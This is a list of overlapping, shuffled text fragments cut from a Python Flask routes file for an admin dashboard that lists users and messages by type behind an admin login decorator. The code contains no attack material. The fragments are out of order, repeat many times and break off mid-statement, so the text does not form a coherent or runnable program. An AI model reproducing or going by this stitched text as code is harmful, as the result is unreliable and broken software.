"= sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks:",
"@admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required",
"dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user",
"#if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [],",
"def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"#current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks),",
"reason I need to also import all from each of these. #especially list_routes",
"render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users,",
"msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks =",
"from flask import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy",
"from each of these. #especially list_routes for find all from list from msg_routes",
"get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [],",
"users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\"",
"@app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\")",
"current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks",
"in tasks: # if task.state == \"current\": # current.append(task) # elif task.state ==",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html')",
"url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column,",
"#--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks =",
"msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs =",
"def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return",
"\"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\")",
"@app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg =",
"or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\"))",
"in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg =",
"@app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for",
"from user_routes import * #needs to be above all functions that use it???",
"all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\")",
"= db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def",
"flask import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import",
"[], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\",",
"title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return",
"sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy",
"from flask_app import db, app from models import User, Msg import msg_routes, user_routes",
"list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if",
"Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from",
"title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return",
"render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks",
"#x.id)) #for task in tasks: # if task.state == \"current\": # current.append(task) #",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title =",
"for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def",
"return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id)",
"get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs():",
"dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\")",
"User, Msg import msg_routes, user_routes from functools import wraps #for some reason I",
"sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: #",
"find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs =",
"dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\")",
"dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html',",
"not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted = [], [], []",
"\"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template, request,",
"@admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users,",
"user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get",
"= \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users =",
"render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs",
"not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg",
"SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean )",
"of these. #especially list_routes for find all from list from msg_routes import *",
"#Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\"",
"current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current ==",
"in msgs: # if msg.current == True: # return msg # return None",
"\"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True)",
"return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs",
"current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current",
"\"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\")",
"to be above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function():",
"msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all",
"title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return",
"Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app",
"task in tasks: # if task.state == \"current\": # current.append(task) # elif task.state",
"task.state == \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) #",
"return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count()",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title",
"#current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count()",
"from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from",
"Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users =",
"= db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def",
"users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required",
"@app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html',",
"users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required",
"@app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html',",
"tasks: # if task.state == \"current\": # current.append(task) # elif task.state == \"completed\":",
"app from models import User, Msg import msg_routes, user_routes from functools import wraps",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs",
"= Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users",
"title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return",
"#tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id))",
"users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404():",
"above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user",
"#tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in",
"each of these. #especially list_routes for find all from list from msg_routes import",
"key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if",
"routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g,",
"return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg =",
"= \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users =",
"#get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs)",
"msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index():",
"#Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs,",
"title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users",
"= \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users =",
"coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs",
"dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\")",
"= db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users,",
"datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for, session, flash",
"import msg_routes, user_routes from functools import wraps #for some reason I need to",
"#x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\": # current.append(task)",
"def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"msg_routes import * from user_routes import * #needs to be above all functions",
"MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import db,",
"Msg import msg_routes, user_routes from functools import wraps #for some reason I need",
"flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey,",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def",
"@admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users,",
"the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: #",
"deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:(",
"= get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for",
"if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type",
"users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required",
"All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect,",
"= \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users =",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online",
"get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the",
"msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return",
"@admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg()",
"redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs =",
"Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template,",
"import all from each of these. #especially list_routes for find all from list",
"return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all()",
"elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg():",
"the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs():",
"dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\")",
"# -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import",
"user_routes from functools import wraps #for some reason I need to also import",
"def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html',",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs",
"flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String,",
"( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_",
"functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None",
"redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def",
"num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages",
"#Modules from flask_app import db, app from models import User, Msg import msg_routes,",
"the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get",
") from sqlalchemy import or_ #Modules from flask_app import db, app from models",
"#for some reason I need to also import all from each of these.",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title",
"#Built-in/Generic import datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for,",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs():",
"#x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\":",
"wraps #for some reason I need to also import all from each of",
"users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\"",
"list from msg_routes import * from user_routes import * #needs to be above",
"session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg()",
"db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs)",
"'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs,",
"for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs():",
"db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all()",
"to also import all from each of these. #especially list_routes for find all",
"current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not",
"#filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in",
"g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type !=",
"@app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html',",
"def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session",
"is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\":",
"sqlalchemy import or_ #Modules from flask_app import db, app from models import User,",
"elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current,",
"db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return",
"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg",
"Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from",
"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\")",
"find_current_msg(msgs):# # for msg in msgs: # if msg.current == True: # return",
"= db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for",
"dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"= \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users =",
"x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state",
"dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\")",
"with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current",
"import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean",
"def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from",
"for find all from list from msg_routes import * from user_routes import *",
"import datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for, session,",
"num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the",
"render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all",
"import * from user_routes import * #needs to be above all functions that",
"for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html',",
"list_routes for find all from list from msg_routes import * from user_routes import",
"<filename>routes.py<gh_stars>0 #!interpreter [optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes",
"@app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\")",
"all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title =",
"msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required",
"return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg,",
"= [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important,",
"import or_ #Modules from flask_app import db, app from models import User, Msg",
"flask_app import db, app from models import User, Msg import msg_routes, user_routes from",
"for msg in msgs: # if msg.current == True: # return msg #",
"else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current,",
"#@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current == True:",
"key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True",
"completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html',",
"\"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id'])",
"msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if",
"session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function",
"these. #especially list_routes for find all from list from msg_routes import * from",
"def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\")",
"def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in",
"\"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\")",
"def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html',",
"return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\")",
"db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users():",
"msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\")",
